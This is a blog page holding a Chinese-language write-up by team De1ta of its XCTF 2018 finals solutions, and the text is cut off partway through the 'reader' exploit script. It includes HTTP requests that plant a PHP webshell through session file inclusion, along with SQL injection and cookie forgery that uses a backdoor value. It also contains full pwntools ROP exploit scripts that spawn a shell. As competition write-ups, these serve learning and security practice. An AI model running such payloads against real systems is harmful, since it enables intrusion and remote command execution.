<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head><meta name="generator" content="Hexo 3.9.0">

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!--Description-->
    
        <meta name="description" content="De1ta-Team">
    

    <!--Author-->
    
        <meta name="author" content="chybeta、pr0ph3t">
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="XCTF 2018 FINALS Writeup">
    

    <!--Open Graph Description-->
    

    <!--Open Graph Site Name-->
    <meta property="og:site_name" content="De1ta">

    <!--Type page-->
    
        <meta property="og:type" content="article">
    

    <!--Page Cover-->
    

    <meta name="twitter:card" content="summary">
    

    <!-- Title -->
    
    <title>XCTF 2018 FINALS Writeup - De1ta</title>

    <!-- Bootstrap Core CSS -->
    <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.2/css/bootstrap.min.css" integrity="sha384-y3tfxAZXuh4HwSYylfB+J125MxIs6mR5FOHamPBG064zB+AFeWH94NdvaCBm8qnd" crossorigin="anonymous">

    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="/css/style.css">

    <!-- Google Analytics -->
    


</head>


<body>

<div class="bg-gradient"></div>
<div class="bg-pattern"></div>

<!-- Menu -->
<!--Menu Links and Overlay-->
<div class="menu-bg">
    <div class="menu-container">
        <ul>
            
            <li class="menu-item">
                <a href="/">
                    Home
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/archives">
                    Archives
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/about">
                    About
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/tags">
                    Tags
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/categories">
                    Categories
                </a>
            </li>
            
            <li class="menu-item">
                <a href="/contact">
                    Contact
                </a>
            </li>
            
        </ul>
    </div>
</div>

<!--Hamburger Icon-->
<nav>
    <a href="#menu"></a>
</nav>

<div class="container">

    <!-- Main Content -->
    <div class="row">
    <div class="col-sm-12">

        <!--Title and Logo-->
        <header>
    <div class="logo">
        <a href="/"><img src="https://avatars0.githubusercontent.com/u/39492862"></a>
        
        <!-- hacked by chybeta -->
    </div>
</header>

        <section class="main">
            
<div class="post">

    <div class="post-header">
        <h1 class="title">
            <a href="/2018/11/04/XCTF 2018 FINALS/">
                XCTF 2018 FINALS Writeup
            </a>
        </h1>
        <div class="post-info">
            
                <span class="date">2018-11-04</span>
            
            
            
        </div>
    </div>

    <div class="content">

        <!-- Gallery -->
        

        <!-- Post Content -->
        <h1 id="De1ta-Team"><a href="#De1ta-Team" class="headerlink" title=" De1ta-Team"></a> <strong>De1ta-Team</strong></h1><a id="more"></a>
<blockquote>
<p>Team：De1ta</p>
</blockquote>
<p>题目打包链接：<a href="https://raw.githubusercontent.com/De1ta-team/CTF_Challenges/master/XCTF2018_Final_Challenges.zip" target="_blank" rel="noopener">https://raw.githubusercontent.com/De1ta-team/CTF_Challenges/master/XCTF2018_Final_Challenges.zip</a></p>
<p>今年我们De1ta在前面一半XCTF联赛分站赛都没有参加的情况下，以后几场分站赛总积分排名第19勉强挤进XCTF总决赛（感谢r3kapig的大佬们抬了一手），最终我们解题排名第六，攻防排名第九，总分排名第九，给队内所有师傅递茶！tql</p>
<p>顺便打个小广告：De1ta长期招Web/逆向/pwn/密码学/硬件/取证/杂项/etc.选手，急招二进制和密码选手,有意向的大佬请联系ZGUxdGFAcHJvdG9ubWFpbC5jb20=</p>
<p>[TOC]</p>
<h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="best-php"><a href="#best-php" class="headerlink" title="best php"></a>best php</h2><p>just try it!<br><a href="http://10.99.99.16" target="_blank" rel="noopener">http://10.99.99.16</a><br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/babyphp_00.png" alt></p>
<p>index.php<br><figure class="highlight php5"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    error_reporting(<span class="number">0</span>);</span><br><span class="line">    ini_set(<span class="string">'open_basedir'</span>, <span class="string">'/var/www/html:/tmp'</span>);</span><br><span class="line">    $file = <span class="string">'function.php'</span>;</span><br><span class="line">    $func = <span class="keyword">isset</span>($_GET[<span class="string">'function'</span>])?$_GET[<span class="string">'function'</span>]:<span class="string">'filters'</span>; </span><br><span class="line">    call_user_func($func,$_GET);</span><br><span class="line">    <span class="keyword">include</span>($file);</span><br><span class="line">    session_start();</span><br><span class="line">    $_SESSION[<span class="string">'name'</span>] = $_POST[<span class="string">'name'</span>];</span><br><span class="line">    <span class="keyword">if</span>($_SESSION[<span class="string">'name'</span>]==<span class="string">'admin'</span>)&#123;</span><br><span class="line">        header(<span class="string">'location:admin.php'</span>);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>从index.php可以看出$_GET[‘function’] 和 $_SESSION[‘name’] = $_POST[‘name’] 可控</p>
<p>其中call_user_func($func,$_GET);回调函数可利用<br>而且include($file);调用了文件包含</p>
<p>所以，可以调用变量覆盖函数，覆盖掉$file，从而引入文件包含<br>payload:<br><a href="http://10.99.99.16/?function=extract&amp;file=php://filter/read=convert.base64-encode/resource=./function.php" target="_blank" rel="noopener">http://10.99.99.16/?function=extract&amp;file=php://filter/read=convert.base64-encode/resource=./function.php</a></p>
<p>一开始只是highlight_file给出index.php的源码，利用文件包含读到了admin.php和function.php的源码，不过对解题没啥卵用。</p>
<p>吐槽点：早上题目的环境是php7.2，extract函数是无法动态调用的，然后中午主办方偷偷改了环境为7.0，也不发公告说一声，浪费了很多时间。</p>
<p>调用session_start函数，修改session的位置<br>从index.php可以看出$_SESSION[‘name’] = $_POST[‘name’]，session的值可控，session默认的保存位置为</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">/var/lib/php/sess_PHPSESSID</span><br><span class="line">/var/lib/php/sessions/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">/var/lib/php5/sess_PHPSESSID</span><br><span class="line">/var/lib/php5/sessions/sess_PHPSESSID</span><br><span class="line"></span><br><span class="line">/tmp/sess_PHPSESSID</span><br><span class="line">/tmp/sessions/sess_PHPSESSID</span><br></pre></td></tr></table></figure>
<p>由于ini_set(‘open_basedir’, ‘/var/www/html:/tmp’)，我们包含不了/var/lib/下的session</p>
<p>但是我在tmp下也找不到自己的session，所以这里的session应该是在/var/lib/下</p>
<p>这里可以调用session_start函数，修改session的位置</p>
<p>这里直接把session写到了web根目录，并且内容可控<br>再利用变量覆盖，调用文件包含，即可get shell<br><a href="http://10.99.99.16/index.php?function=extract&amp;file=./sess_lfc5uk0rv8ndmjfv86u9tv6fk2" target="_blank" rel="noopener">http://10.99.99.16/index.php?function=extract&amp;file=./sess_lfc5uk0rv8ndmjfv86u9tv6fk2</a></p>
<p>payload:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">POST /index.php?function=session_start&amp;save_path=/tmp HTTP/1.1</span><br><span class="line">Host: 10.99.99.16</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 41</span><br><span class="line"></span><br><span class="line">name=&lt;?php echo &quot;aaa&quot;;system($_GET[x]);?&gt;</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /index.php?function=extract&amp;file=/tmp/sess_a9tvfth9lfqabt9us85t3b07s1&amp;x=cat+sdjbhudfhuahdjkasndjkasnbdfdf.php HTTP/1.1</span><br><span class="line">Host: 10.99.99.16</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Connection: close</span><br><span class="line">Cookie: PHPSESSID=a9tvfth9lfqabt9us85t3b07s1</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/babyphp_01.png" alt></p>
<blockquote>
<p>flag:flag{best_H4cker_in_xctf}</p>
</blockquote>
<h2 id="PUBG"><a href="#PUBG" class="headerlink" title="PUBG"></a>PUBG</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">chi ji ma？host: 159.138.2.46:8888 http://guaika.txmeili.com:8888/kss_admin/index.php</span><br><span class="line"></span><br><span class="line">hint1:先找源码，题目环境正在修复。 Try to find the source code first, the author is fixing the challenge environment.</span><br><span class="line"></span><br><span class="line">hint2:题目环境已更新http://guaika.txmeili.com:8888/a.php，验证码看不到的可以访问这个159.138.22.212; Challegen environmen has been updated, http://guaika.txmeili.com:8888/a.php, if you have problem with authorize code, please access to 159.138.22.212</span><br><span class="line">验证码在 http://guaika.txmeili.com:8888/a.php</span><br></pre></td></tr></table></figure>
<p>扫描目录，发现源码 <a href="http://guaika.txmeili.com:8888/www.zip" target="_blank" rel="noopener">http://guaika.txmeili.com:8888/www.zip</a></p>
<p>部分文件使用了ZEND/PHP5.2加密，解密工具：<a href="https://pan.baidu.com/s/1eQjnVGm" target="_blank" rel="noopener">https://pan.baidu.com/s/1eQjnVGm</a>  ，选择“PHP 5.2 NM 解码”，解密后变量名还是有点乱，可以用 <a href="http://www.zhaoyuanma.com/phpzendfix.html" target="_blank" rel="noopener">http://www.zhaoyuanma.com/phpzendfix.html</a> 进行变量名的修复。</p>
<p>在/kss_inc/payapi_return.php 中发现存在SQL注入：<br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_00.png" alt><br>SerialNo参数可以进行盲注：<br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_01.png" alt><br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_02.png" alt></p>
<p>使用sqlmap可以拖出数据，需要加option –risk 3 –level 5 –string=”易付通URL签名不正确”<br>因为在默认的risk(1)和level(1)下sqlmap会跳过对or型盲注的检测<br>–string的作用为<br><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_03.png" alt></p>
<p>拖出数据，构造cookie获得admin权限。根据/kss_inc/db_function.php iZSVk4mLkY函数逻辑构造cookie中的kss_manager，根据/kss_inc/function.php jZKVlY6Hk函数逻辑构造cookie中的kss_manager_ver<br>kss_manager=1,axing,8ccf03839a8c63a3a9de17fa5ac6a192,efefefef<br>kss_manager_ver=md5(kss_manager.COOKKEY)<br>efefefef是/kss_inc/db_function.php中的后门linecode值，COOKKEY的值可以在/kss_inc/_config.php中找到。从而我们可以登录管理后台。</p>
<p>接下来考虑如何getshell。在/kss_admin/中存在升级功能，</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_04.png" alt></p>
<p>跟进该函数，发现其使用了回调函数read_body</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_05.png" alt></p>
<p>read_body函数使用了file_put_contents函数将curl的返回结果写入/kss_tools/_webup.php</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_06.png" alt></p>
<p>如果我们能够控制curl的返回内容，我们就能实现getshell<br>我们看到url里拼接的变量是可控的：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_07.png" alt></p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_08.png" alt></p>
<p>在<a href="http://api.hphu.com/test/kss_admin/index.php" target="_blank" rel="noopener">http://api.hphu.com/test/kss_admin/index.php</a> 有一套demo，同时，在/kss_inc/function.php可以看到SQL注入过滤函数i4mIkpO，其中对SQL敏感字符过滤的部分：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_09.png" alt></p>
<p>可以看到，该过滤函数会将有敏感字符的部分直接回显，利用这个函数，结合可控的拼接到url的变量，我们可以控制curl <a href="http://api.hphu.com" target="_blank" rel="noopener">http://api.hphu.com</a> 某个文件的返回内容getshell</p>
<p>那么，我们全局查找一下使用了该函数的文件，发现很多文件都用了该函数，例如/kss_admin/admin_logs.php</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_10.png" alt></p>
<p>尝试构造：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_11.png" alt></p>
<p>写shell：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_12.png" alt></p>
<p>getflag：</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Web/PUBG_13.png" alt></p>
<blockquote>
<p>flag:flag{@_n1ce_s1ng@p0r3_tr1p_:)}</p>
</blockquote>
<blockquote>
<p>PS:附上队内@aye 师傅的Web wp：<br>baby php：<a href="https://www.jianshu.com/p/7d63eca80686" target="_blank" rel="noopener">https://www.jianshu.com/p/7d63eca80686</a><br>PUBG：<a href="https://www.jianshu.com/p/bad7af1a631c" target="_blank" rel="noopener">https://www.jianshu.com/p/bad7af1a631c</a></p>
</blockquote>
<h1 id="Pwn"><a href="#Pwn" class="headerlink" title="Pwn"></a>Pwn</h1><h2 id="nobof"><a href="#nobof" class="headerlink" title="nobof"></a>nobof</h2><p>nc 10.99.99.16 29999</p>
<p>这道题是用clang编译的，用了safestack </p>
<p>审了一遍，发现get_int函数能在safestack上面溢出，但是并没有什么用，利用不了</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Pwn/nobuf_00.png" alt></p>
<p>menu这个格式化字符串漏洞非常明显，但是只能用来leak，因为检测了有没有n这个字母</p>
<p>最后审出来的是下标溢出漏洞，基本存在于每个有用到下标的地方</p>
<p>我们用update来解释下</p>
<p><img src="hhttps://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Pwn/nobuf_01.png" alt></p>
<p>首先get_int会读取一个数字，然后判断是否大于256，但是v1其实是可以为负数</p>
<p>例如v1 = 0xf0000001，这个在程序里面判断的是一个小于0的数</p>
<p>然后在下面&amp;books[64 * v1 + 2]  这个地方</p>
<p>v1*64= 0xf0000001 &lt;&lt;8 = 0x00000100</p>
<p>这样就能bypass它的v1&lt;256这个检查</p>
<p>那么能用来干什么呢？</p>
<p>很明显可以去写libc的malloc_hook或者free_hook，还可以去写栈，直接rop</p>
<p>最后选择了直接去写栈，不过因为栈地址会变，所以我限制了一下栈地址的范围，不然写着写着会报错</p>
<p>下面是简单的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug=<span class="number">0</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p=process(<span class="string">'./no-bof'</span>)</span><br><span class="line">    <span class="comment">#p=process('',env=&#123;'LD_PRELOAD':'./libc.so'&#125;)</span></span><br><span class="line">    gdb.attach(p)</span><br><span class="line">    e=ELF(<span class="string">'/lib/i386-linux-gnu/libc-2.23.so'</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=remote(<span class="string">'10.99.99.16'</span>, <span class="number">29999</span>)</span><br><span class="line">    e=ELF(<span class="string">'./x32_libc-2.19.so'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ru</span><span class="params">(x)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">se</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.send(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">sl</span><span class="params">(x)</span>:</span></span><br><span class="line">    p.sendline(x)</span><br><span class="line"></span><br><span class="line">ru(<span class="string">'Your input: '</span>)</span><br><span class="line">sl(<span class="string">'4 %47$p%26$p'</span>)</span><br><span class="line">ru(<span class="string">'Your choice is:4 '</span>)</span><br><span class="line">data=ru(<span class="string">'&amp;#92;n'</span>)</span><br><span class="line">ru(<span class="string">'Your input: '</span>)</span><br><span class="line"></span><br><span class="line">libc=int(data[:<span class="number">10</span>],<span class="number">16</span>)</span><br><span class="line">stack=int(data[<span class="number">10</span>:<span class="number">20</span>],<span class="number">16</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    base=libc<span class="number">-0x18637</span></span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    base=libc<span class="number">-0x19AD3</span></span><br><span class="line">book=<span class="number">0x84978E4</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line"><span class="string">binsh=base+e.search('/bin/sh').next()</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">offset=(binsh-book)&amp;gt;&amp;gt;8</span></span><br><span class="line"><span class="string">offset+=0</span></span><br><span class="line"><span class="string">target=book+offset*0x100+8</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">offset+=0xf0000000</span></span><br><span class="line"><span class="string">offset=offset-0x100000000</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">print(hex(target))</span></span><br><span class="line"><span class="string">print(hex(binsh))</span></span><br><span class="line"><span class="string">print(hex(target-base))</span></span><br><span class="line"><span class="string">print(hex(base))</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">sl('5')</span></span><br><span class="line"><span class="string">ru('which book do you want to print?')</span></span><br><span class="line"><span class="string">sl(str(offset))</span></span><br><span class="line"><span class="string">'''</span></span><br><span class="line">offset=(stack-book)&amp;gt;&amp;gt;<span class="number">8</span></span><br><span class="line"></span><br><span class="line">target=book+offset*<span class="number">0x100</span>+<span class="number">8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> stack-target&amp;lt;<span class="number">0x2c</span> <span class="keyword">or</span> stack-target&amp;gt;<span class="number">0x5c</span>:</span><br><span class="line">    exit()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">offset+=<span class="number">0xf0000000</span></span><br><span class="line">offset=offset<span class="number">-0x100000000</span></span><br><span class="line"></span><br><span class="line">binsh=base+e.search(<span class="string">'/bin/sh'</span>).next()</span><br><span class="line">system=base+e.symbols[<span class="string">'system'</span>]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sl(<span class="string">'2'</span>)</span><br><span class="line">ru(<span class="string">'which book do you want to update?'</span>)</span><br><span class="line">sl(str(offset))</span><br><span class="line">ru(<span class="string">'Book title: '</span>)</span><br><span class="line">sl(<span class="string">'&amp;#92;x00'</span>*(stack<span class="number">-0x2c</span>-target)+p32(system)+p32(binsh)*<span class="number">2</span>)</span><br><span class="line">ru(<span class="string">'Book price: '</span>)</span><br><span class="line">sl(<span class="string">'1'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h2 id="reader"><a href="#reader" class="headerlink" title="reader"></a>reader</h2><p>nc 10.99.99.16 19999</p>
<p>这道题感觉有点坑爹，首先随便审了一下main函数，发现好像有一个任意执行</p>
<p><img src="https://raw.githubusercontent.com/De1ta-team/pic/master/XCTF2018_Final_wp/Pwn/reader_00.png" alt></p>
<p>但是后面却发现，这里根本利用不了……..</p>
<p>题目有这些功能</p>
<ol>
<li>input original raw text</li>
<li>input paper form text</li>
<li>input book form text</li>
<li>export book to paper</li>
<li>export paper to book</li>
<li>proofread input material with raw text</li>
<li>delete </li>
<li>show file</li>
</ol>
<p>下面来解释一下这些功能</p>
<p><strong>input original raw text</strong></p>
<p>简单的读255字节到bss段</p>
<p><strong>input paper form text</strong></p>
<p>选择写入哪一个paper，然后读取</p>
<p>content: 255个字节<br>title:  31个字节<br>description: 127个字节</p>
<p>再用strlen来得到content的长度，写进结构体的第四个字节处</p>
<p><strong> input book form text</strong></p>
<p>选择写入哪一个book，然后读取</p>
<p>content: 255个字节<br>title:  31个字节<br>description: 255个字节</p>
<p>再用strlen来得到content的长度，写进结构体的第四个字节处</p>
<p><strong>export book to paper</strong></p>
<p>选择将哪个book复制到哪个paper</p>
<p>具体是，将book的content的size写到paper的content的size处</p>
<p>然后<br>memcpy( paper’s content,  book’s content,  0xff);<br>memcpy( paper’s title,  book’s title,  0xff);<br>memcpy( paper’s description,  book’s description,  0xff);  </p>
<p>这里就漏洞的所在点，这里能溢出到下一个paper的size和content</p>
<p><strong>export paper to book</strong></p>
<p>和上一个功能差不多，不多说了</p>
<p><strong>proofread input material with raw text</strong></p>
<p>首先计算了某个paper或book的content和 raw_content有前多少个字节相等</p>
<p>然后让你猜大概前多少个字节相等</p>
<p>假如你猜的前n个字节是相等的，那么它就会用strncmp来判断，返回的结果是相等的话，就会打印栈上读进来content的前n个字节</p>
<p>这里的漏洞就是利用了strncmp是用于字符串判断相等的，假如我们content和raw content 都是空的，这里也会返回判断相等</p>
<p>但是n的话可以是一个很大的数，这样就能leak出栈上的内容</p>
<p><strong>delete</strong></p>
<p>首先会在栈上开辟book或paper结构体大小的空间</p>
<p>然后再memcpy到上面，最后memset原来的内存</p>
<p><img src="http://pro.leanote.com/file/image/5bdd668757926df60c0d700c" alt></p>
<p>但是这里它忘记判断content的size的大小，直接就memcpy上去了，所以就造成栈溢出了</p>
<p>所以利用链大概是</p>
<ol>
<li>leak出栈上有用的信息</li>
<li>溢出改paper的content  size位</li>
<li>写rop链到下一个paper</li>
<li>delete被改size位的paper，get shell</li>
</ol>
<p>下面是比赛的时候写的payload，可能不太简洁，凑合着看吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">debug=<span class="number">0</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug:</span><br><span class="line">    p=process(<span class="string">'./reder'</span>)</span><br><span class="line">    <span class="comment">#p=process('',env=&#123;'LD_PRELOAD':'./libc.so'&#125;)</span></span><br><span class="line">    gdb.attach(p)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    p=remote(<span class="string">'10.99.99.16'</span>,<span class="number">19999</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ru</span><span class="params">(x)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> p.recvuntil(x)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">se</span><span 